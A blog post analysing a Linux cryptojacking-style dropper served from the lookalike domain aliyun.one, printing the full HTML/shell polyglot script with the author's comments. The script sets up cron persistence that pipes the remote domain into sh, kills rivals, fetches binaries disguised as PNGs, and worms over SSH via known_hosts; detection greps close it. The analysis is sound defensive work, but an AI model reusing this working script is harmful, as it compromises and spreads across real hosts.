This is from quite a while back. I found it sitting on my hard drive, figured it needed somewhere to go, so I'm dumping it on the blog.
Someone in a group chat asked why an Alibaba Cloud link was showing up on their Tencent Cloud host. Commercial rivalry, maybe?
I took a look: aliyun.one ?
My first thought was phishing. Since when does Alibaba Cloud own that domain? So I ran it through a DNS lookup tool, and every responding node turned out to be outside mainland China.
I'm querying from inside China, so why is the DNS pointing me overseas? That settled it: this is malware.
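If you want to reproduce that check, dig and whois are enough; a rough sketch (the IP below is only a placeholder, and the answers will of course differ over time):

dig +short aliyun.one                 # A records the domain resolves to
dig +short NS aliyun.one              # the nameservers answering for it
whois 203.0.113.10 | grep -i country  # where a returned IP is actually hosted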
Opening the URL in a browser immediately redirects you to aliyun.com; if you didn't know better, you'd think it really was Alibaba Cloud.
Then I curl'ed it, and the content was different: the response contains both HTML and shell script.
The HTML is there to redirect to aliyun.com, the shell part is there to run on Linux, and each half is hidden from the other with a different comment syntax so they don't interfere. Quite interesting.
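Stripped to its bare minimum, the trick looks something like this (a toy reconstruction with example.com as a stand-in; the real sample follows below):

#<script>window.location.href="http://example.com";</script><!--
echo "only sh ever gets this far"
#-->

A browser executes the script on the first line and redirects, and the <!-- right after it comments out everything until the closing --> on the last line; sh treats the first and last lines as # comments and runs only the body in between.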
At a quick glance, it sets itself up to run on a schedule, downloads and executes a binary matched to the system's word size, and also spreads to other hosts…
https://www.v2ex.com/amp/t/626230/1
https://blog.csdn.net/xujiamin0022016/article/details/103319879
The files involved:
Only the index-page file is shown here, with a few notes of my own added inline. Having read through it, this frontend code monkey can only marvel at how inventive the whole idea is.
#<script>window.location.href="http://aliyun.com";</script><!--
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
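## note: if someone "disabled" wget/curl by renaming them to wge/cur, rename them back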
mv /bin/wge /bin/wget
mv /bin/cur /bin/curl
mv /usr/bin/wge /usr/bin/wget
mv /usr/bin/cur /usr/bin/curl
mkdir -p /tmp
chmod 1777 /tmp
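## note: persistence: refetch aliyun.one every 10 minutes and pipe it into sh, via the user crontab and again via /etc/crontab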
echo "*/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())')|sh"|crontab -
cat > /etc/crontab <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
*/10 * * * * root (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())'||/usr/local/sbin/6be3a53abd)|sh
EOF
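## note: disable swap, clear the immutable flag on cron files, then delete any cron file that calls wget/curl but does not reference aliyun.one (i.e. rival malware)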
swapoff -a
find /etc/cron*|xargs chattr -i
find /var/spool/cron*|xargs chattr -i
grep -RE "(wget|curl)" /etc/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
grep -RE "(wget|curl)" /var/spool/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
netstat -anp|grep :::6345|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
netstat -anp|grep 119.9.76.107:443|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
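## note: find a writable directory by touching a test file in a few system paths, settle in the last one that worked (or /tmp), clean up, and add it to PATH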
cd /tmp
touch /usr/local/bin/writeablex && cd /usr/local/bin/
touch /usr/libexec/writeablex && cd /usr/libexec/
touch /usr/bin/writeablex && cd /usr/bin/
rm -rf /usr/local/bin/writeablex /usr/libexec/writeablex /usr/bin/writeablex
export PATH=$PATH:$(pwd)
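## note: payload download sources, 64-bit and 32-bit builds disguised as .png files on third-party CDNs and GitHub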
a64="img.sobot.com/chatres/89/msg/20191225/1/ec0991da601e45c4b0bb6178da5f0cc4.png"
a32="img.sobot.com/chatres/89/msg/20191225/1/50659157a100466a88fed550423a38ee.png"
b64="cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269944760/2.637890910155951.png"
b32="cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269966297/8.872362655092918.png"
c64="https://user-images.githubusercontent.com/56861392/71443284-08acf200-2745-11ea-8ef3-509d9072d970.png"
c32="https://user-images.githubusercontent.com/56861392/71443285-08acf200-2745-11ea-96c3-0c2be9135085.png"
if [ ! -f "6be3a53abd" ]; then
ARCH=$(getconf LONG_BIT)
if [ ${ARCH}x = "64x" ]; then
(curl -fsSL -m180 $a64 -o 6be3a53abd||wget -T180 -q $a64 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("http://'$a64'", "6be3a53abd")'||curl -fsSL -m180 $b64 -o 6be3a53abd||wget -T180 -q $b64 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("http://'$b64'", "6be3a53abd")'||curl -fsSL -m180 $c64 -o 6be3a53abd||wget -T180 -q $c64 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("'$c64'", "6be3a53abd")')
else
(curl -fsSL -m180 $a32 -o 6be3a53abd||wget -T180 -q $a32 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("http://'$a32'", "6be3a53abd")'||curl -fsSL -m180 $b32 -o 6be3a53abd||wget -T180 -q $b32 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("http://'$b32'", "6be3a53abd")'||curl -fsSL -m180 $c32 -o 6be3a53abd||wget -T180 -q $c32 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("'$c32'", "6be3a53abd")')
fi
fi
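## note: make it executable and run it from whichever location it landed in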
chmod +x 6be3a53abd
$(pwd)/6be3a53abd || ./6be3a53abd || /usr/bin/6be3a53abd || /usr/libexec/6be3a53abd || /usr/local/bin/6be3a53abd || 6be3a53abd || /tmp/6be3a53abd || /usr/local/sbin/6be3a53abd
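## note: lateral movement: collect IPs from root's and every /home user's known_hosts and run the same aliyun.one one-liner on them over non-interactive ssh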
if [ -f /root/.ssh/known_hosts ]; then
for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())')|sh >/dev/null 2>&1 &";done
fi
for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ]; then
for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())')|sh >/dev/null 2>&1 &";done
fi
fi
done
#-->
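By the way, the strings above already make decent indicators if you want to check whether a box has been hit; something along these lines works (it only catches this particular strain, adjust the paths to your distro):

crontab -l 2>/dev/null | grep aliyun.one
grep -R "aliyun.one" /etc/cron* /var/spool/cron* 2>/dev/null
ps aux | grep 6be3a53abd | grep -v grep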
All of the associated files: aliyun.one.zip
I won't paste them out here directly.